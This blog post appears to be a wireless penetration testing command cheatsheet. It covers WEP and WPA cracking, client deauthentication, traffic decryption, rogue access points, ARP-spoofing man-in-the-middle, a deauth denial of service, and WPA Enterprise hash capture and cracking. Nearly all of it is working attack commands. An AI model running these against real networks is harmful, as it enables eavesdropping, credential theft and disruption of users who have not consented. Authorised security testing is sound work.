Wireless Penetration Testing Cheatsheet

August 03, 2025
Wireless Penetration Testing Tutorial: A Command Guide

Wireless Penetration Testing Cheatsheet

Updated on August 11, 2025

Welcome to our comprehensive wireless penetration testing tutorial. This guide provides a practical command reference for ethical hackers and security professionals. Before proceeding, ensure you have explicit permission to test the target network, as unauthorized access is illegal. These WiFi security testing techniques are for educational and professional purposes only. 

Wireless Penetration Testing Cheatsheet


Understanding the Basics: Changing Your MAC Address

An essential first step in any network assessment is to change your device's MAC address. This helps anonymize your hardware and bypass basic MAC filtering. You can use tools like `macchanger` or the `ifconfig` command.

Using `macchanger`:

macchanger -m aa:bb:cc:11:22:33 wlan0

Alternatively, use `ifconfig`:

ifconfig eth0 down
ifconfig eth0 hw ether aa:bb:cc:11:22:33
ifconfig eth0 up


Cracking WEP Encryption

WEP (Wired Equivalent Privacy) is an outdated and insecure protocol. Cracking it involves collecting a sufficient number of weak Initialization Vectors (IVs) using the Aircrack-ng suite, an essential toolset covered in many Wifi Hacking tutorials.

  1. Start Monitor Mode: Put your wireless card into monitor mode to capture all traffic. 
    airmon-ng start wlan0
  2. Discover Networks: Scan for available wireless networks to identify your target's BSSID and channel. 
    airodump-ng wlan0mon
  3. Capture IV Packets: Focus on the target network and save the captured packets to a file. Do not close this terminal. 
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 -w PacketCapture wlan0mon
  4. Crack the Password: Once enough data packets (IVs) are collected, use aircrack-ng to analyze the capture file and reveal the key. 
    aircrack-ng PacketCapture*.cap


Cracking WPA/WPA2 PSK Encryption

WPA/WPA2 with a Pre-Shared Key (PSK) is significantly more secure than WEP. The primary attack vector is to capture the four-way WPA2 handshake that occurs when a client authenticates. This process is a core component of any modern wireless penetration testing exercise.

  1. Stop Network Services: Prevent interference from your system's network manager. 
    service network-manager stop
  2. Start Monitor Mode: 
    airmon-ng start wlan0
  3. Discover Networks: 
    airodump-ng wlan0mon
  4. Capture the Handshake: Target the specific network and wait for a "WPA handshake" message to appear in the top right of the terminal. 
    airodump-ng --bssid 00:11:22:33:44:55 -c 1 -w wpadump wlan0mon
  5. Force Re-authentication (Optional): To speed up the process, you can de-authenticate a connected client, forcing them to reconnect and generate a new handshake. 
    aireplay-ng --deauth 50 -a [router_MAC_Address] -c [Victim_MAC_Station] wlan0mon
  6. Crack the Password: Once the handshake is captured, stop airodump-ng (`Ctrl+C`) and run an offline dictionary attack against the capture file. 
    aircrack-ng -w wordlist.txt wpadump*.cap

For more details on network protocols, you can consult resources from the IEEE. Additionally, you can learn more about captive portal pentesting techniques on our blog.


Eavesdropping on a Wireless Network

If you already have the network password, you can decrypt live traffic to see the data being transmitted by other users on the network.

  1. Kill Conflicting Processes: Use `airmon-ng check kill` to stop any processes that might interfere with monitor mode. 
    airmon-ng check kill
airmon-ng start wlan0
  2. Capture Encrypted Data: Use airodump-ng to capture a large amount of data from the target network. 
    airodump-ng --bssid 00:11:22:33:44:55 --channel [Channel_Number] -w wpadump wlan0mon
  3. Decrypt the Traffic: Use `airdecap-ng` with the known network password to decrypt the packet capture file.

    For WEP (key must be in hexadecimal):

    airdecap-ng -w [WEP_Password_in_Hex] wepdump.cap

    For WPA/WPA2:

    airdecap-ng -p [WPA_Password] wpadump.cap
  4. Analyze Traffic: Open the newly created `WPAdump-dec.cap` file in Wireshark to analyze the decrypted traffic.


Setting up a Rogue Access Point Manually

A Rogue Access Point setup creates a malicious Wi-Fi network that appears legitimate, tricking users into connecting. This allows an attacker to intercept or manipulate their traffic.

  1. Enable Monitor Mode and Assign IP: 
    airmon-ng start wlan0
ifconfig wlan0mon 10.0.0.1/24
  2. Install Required Tools: 
    sudo apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
  3. Configure `dnsmasq`: Backup the original file and create a new one to act as our DHCP and DNS server. 
    mv /etc/dnsmasq.conf /etc/dnsmasq.conf_backup
nano dnsmasq.conf

    Add the following content to `dnsmasq.conf`:

    log-facility=/var/log/dnsmasq.log
#Redirect the traffic to our machine, #is any
#address=/#/10.0.0.1
#redirect only google.com to our machine
#address=/google.com/10.0.0.1
interface=wlan0mon
dhcp-range=10.0.0.10,10.0.0.250,12h
#Gateway , Option 3 
dhcp-option=3,10.0.0.1 
#DNS Sever, Option 6
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
  4. Configure `hostapd`: Create a configuration file that defines our fake access point. 
    nano /etc/hostapd/hostapd.conf

    Add this content:

    interface=wlan0mon
driver=nl80211
ssid=FreeWifiHotspot
channel=1
#enable_karma=1
  5. Start the Services: 
    service dnsmasq start 
hostapd /etc/hostapd/hostapd.conf

    Your rogue access point is now active. You can monitor connected clients' DNS queries in `/var/log/dnsmasq.log` or capture all traffic on the `wlan0mon` interface with Wireshark.


Performing a Man-in-the-Middle (MITM) Attack

A Man-in-the-Middle (MITM) attack positions the attacker between the user and the router, allowing for traffic interception and manipulation. The following commands demonstrate two common methods.

Method 1: Using a Rogue AP with IP Forwarding

First, set up the rogue access point as described in the previous section. Then, configure your system to forward traffic from the victims to the real internet.

  1. Configure `iptables` for NAT: 
    #flush MAC tables 
iptables -t nat -F
iptables -F

#create a nat rule for interface which has internet
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#Forward the packets from user to destination
iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT
  2. Enable IP Forwarding: 
    echo '1' > /proc/sys/net/ipv4/ip_forward

Method 2: Using ARP Spoofing

ARP spoofing tricks devices on a local network into sending their traffic to the attacker's machine instead of the legitimate gateway. These Man-in-the-Middle attack commands are very effective on switched networks.

  1. Install Tools: 
    # For Debian/Ubuntu
sudo apt-get install dsniff

# For Arch
pacman -S arpspoof dsniff
  2. Enable IP Forwarding: 
    sysctl -w net.ipv4.ip_forward=1
  3. Identify Targets: View the local ARP table to find the IP and MAC addresses of the victim and gateway. 
    arp -a
  4. Start ARP Spoofing: You need two separate terminal windows for this.

    In the first terminal, poison the victim's ARP cache:

    arpspoof -i ens33 -t [Target_IP] [Gateway_IP]

    In the second terminal, poison the gateway's ARP cache:

    arpspoof -i ens33 -t [Gateway_IP] [Target_IP]
  5. Capture Traffic: With ARP spoofing active, open Wireshark and start capturing packets on your interface (e.g., `ens33`). You can filter by the victim's IP address to see their traffic.


Executing a Denial of Service (DoS) Attack

A wireless DoS attack can disrupt service by repeatedly sending de-authentication frames to a client, forcing them to disconnect from the access point. This leverages the same mechanism used to capture a WPA handshake but repeats it indefinitely.

  1. Enable Monitor Mode and Scan: 
    airmon-ng start wlan0
airodump-ng wlan0mon
  2. Target a Client: Use `aireplay-ng` to continuously de-authenticate a specific client. The `--deauth` argument signifies a deauth attack, and a large number like `5000` sends many packets. 
    aireplay-ng --deauth 5000 -a [router_MAC_Address] -c [Victim_MAC_Station] wlan0mon


Testing WPA Enterprise Security

WPA Enterprise uses a RADIUS server for authentication instead of a PSK. An attack involves setting up a fake AP to capture the MS-CHAPv2 challenge/response hash and then cracking it offline.

  1. Install hostapd-wpe: 
    apt-get update 
apt-get install hostapd-wpe
  2. Configure hostapd-wpe: Edit the configuration file to match the target network's SSID. 
    leafpad /etc/hostapd-wpe/hostapd-wpe.conf

    Inside the file, modify the `ssid` line to match the target enterprise network:

    ssid=NameOftheNetwork
  3. Launch the Fake AP: Stop the network manager and start the WPE-enabled access point. 
    service network-manager stop 
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

    When a victim connects, you will capture their username and an encrypted challenge/response hash.

  4. Crack the Hash: Use `asleap` with the captured challenge, response, and a wordlist to crack the user's password. 
    asleap -C [challenge_code] -R [response_code] -W wordlist.txt

    Always remember to follow ethical guidelines

Enjoyed this guide? Share your thoughts below and tell us how you leverage this wireless penetration testing tutorial in your projects!

Wireless Penetration Testing, Cybersecurity, Aircrack-ng, Ethical Hacking, WPA Cracking, MITM Attack, Kali Linux Commands
, ,
By:
Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment